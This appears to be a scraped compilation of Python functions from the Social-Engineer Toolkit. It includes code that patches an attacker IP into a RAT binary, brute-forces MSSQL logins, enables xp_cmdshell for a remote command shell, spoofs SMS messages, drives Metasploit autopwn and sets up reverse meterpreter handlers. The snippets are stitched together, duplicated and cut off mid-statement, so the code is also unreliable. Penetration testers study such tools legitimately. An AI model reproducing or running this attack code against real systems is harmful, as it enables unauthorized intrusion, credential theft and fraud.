def prepare_ratte(ipaddr,ratteport, persistent,customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr, port = ipaddr
ipaddr = str(ipaddr)
port = str(port)
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
successful_password = None
with open(wordlist) as passwordlist:
for password in passwordlist:
password = password.rstrip()
# try actual password
try:
# connect to the sql server and attempt a password
print("Attempting to brute force {bold}{ipaddr}:{port}{endc}"
" with username of {bold}{username}{endc}"
" and password of {bold}{passwords}{endc}".format(ipaddr=ipaddr,
username=username,
passwords=password,
port=port,
bold=core.bcolors.BOLD,
endc=core.bcolors.ENDC))
target_server = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
if target_server:
core.print_status("\nSuccessful login with username {0} and password: {1}".format(username,
password))
counter = 1
successful_password = password
break
# if login failed or unavailable server
except:
pass
# if we brute forced a machine
if counter == 1:
return ",".join([ipaddr, username, port, successful_password])
# else we didnt and we need to return a false
else:
if ipaddr:
core.print_warning("Unable to guess the SQL password for {0} with username of {1}".format(ipaddr, username))
return False
def _do_sms():
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
core.print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
# I hand wrote the code and can validate its authenticity - it imports python requests
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
from src.sms.protectedapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
def gen_qrcode(url):
# generate the qrcode
qr = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
qr.add_data(url)
qr.make()
im = qr.make_image()
time.sleep(1)
qr_img_path = os.path.join(core.setdir, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path):
os.remove(qr_img_path)
# save the image out
im.save(qr_img_path, format='png')
# print that its been successful
core.print_status("QRCode has been generated under {0}".format(qr_img_path))
def launch():
""" here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks
database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'),
os.path.join(core.userconfigpath, "autopwn.answer")))
child.interact()
# handle exceptions and log them
except Exception as error:
core.log(error)
def prep(database, ranges):
print("\n")
core.print_status("Prepping the answer file based on what was specified.")
# prep the file to be written
with open("src/program_junk/autopwn.answer", "w") as filewrite:
core.print_status("Using the {0} sql driver for autopwn".format(database))
filewrite.write("db_driver {0}\r\n".format(database))
core.print_status("Autopwn will attack the following systems: {0}".format(ranges))
filewrite.write("db_nmap {0}\r\n".format(ranges))
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
core.print_status("Answer file has been created and prepped for delivery into Metasploit.\n")
def cmdshell(ipaddr,port,username,password,option):
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
mssql.execute_query("RECONFIGURE")
mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
mssql.execute_query("RECONFIGURE")
except Exception, e: pass
setcore.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.select_db('master')
while 1:
# cmdshell command
cmd = raw_input("xp_cmdshell> ")
# exit if we want
if cmd == "quit" or cmd == "exit": break
mssql.execute_query("xp_cmdshell '%s'" % (cmd))
if cmd != "":
for line in mssql:
# formatting for mssql output
line = str(line)
line = line.replace("', 'output': '", "\n")
line = line.replace("{0: '", "")
line = line.replace("'}", "")
line = line.replace("{0: None, 'output': None}", "")
line = line.replace("\\r", "")
line = line.replace("The command completed with one or more errors.", "")
print line
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
core.print_status("Connection established with SQL Server...")
core.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;"
"RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"RECONFIGURE;")
except:
pass
core.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while True:
# prompt mssql
cmd = input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit":
break
# if the command isnt empty
elif cmd:
# execute the command
mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd))
# print the rest of the data
mssql.printReplies()
mssql.colMeta[0]['TypeData'] = 80 * 2
mssql.printRows()
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
# print that we were successful
setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
break
# if invalid password
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != "":
setcore.print_warning(
"Unable to guess the SQL password for %s with username of %s" % (ipaddr, username)
)
return False
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
applet_name = core.generate_random_string(6, 15) + ".jar"
core.update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
custom = 1
core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
with open(os.path.join(core.setdir, "web_clone/index.html")) as fileopen:
data = fileopen.read()
with open(os.path.join(core.setdir, "web_clone/index.html.new"), "w") as filewrite:
# we randomize param name so static sigs cant be used
goat_random = core.generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"', 'param name="8" value="{0}"'.format(goat_random))
filewrite.write(data)
subprocess.Popen("mv {0} {1}".format(os.path.join(core.setdir, "web_clone/index.html.new"),
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = input(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
#prep_powershell_payload()
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
#.........这里部分代码省略.........
# added to set 07/27/2012
strSMSServer = "{0}"
strPackageID = "{1}"
Set objLoc = CreateObject("WbemScripting.SWbemLocator")
Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms")
Set Results = objSMS.ExecQuery _
("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true")
For each Loc in Results
If Loc.ProviderForLocalSite = True Then
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Loc.SiteCode)
strSMSSiteCode = Loc.SiteCode
end if
Next
Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'")
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
'''.format(sms_server, package_id)
# write out the file to reports
with open(os.path.join(core.userconfigpath, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.")
core.print_status("Report has been exported to {0}".format(os.path.join(core.definepath, "reports/sccm_configuration.txt")))
pause = input("Press " + core.bcolors.RED + "{return} " + core.bcolors.ENDC + "to exit this menu.")
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
"""
setcore.print_error("*** WARNING ***")
setcore.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
setcore.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = setcore.generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar ../../program_junk/", shell=True)
# move back to original directory
os.chdir("../../../")
setcore.print_status("Java Applet is now signed and will be imported into the website")
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
enabled.\n""")
# grab the path and filename from user
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = core.generate_random_string(8, 15) + ".txt"
def prep_powershell_payload():
# grab stage encoding flag
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
powershell_solo = core.check_options("POWERSHELL_SOLO")
# check if port is there
port = core.check_options("PORT=")
# check if we are using auto_migrate
auto_migrate = core.check_config("AUTO_MIGRATE=")
# check if we are using pyinjection
pyinjection = core.check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
pyinjection = "on"
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
core.update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if not core.validate_ip(ipaddr):
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
data = fileopen.read()
match = re.search(port, data)
if not match:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set EnableStageEncoding {3}\n"
"set ExitOnSession false\n"
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
# if port.options isnt there then prompt
else:
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on" and pyinjection == "off":
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
# specify a list we will use for later
multi_injection_x86 = ""
#.........这里部分代码省略.........
请发表评论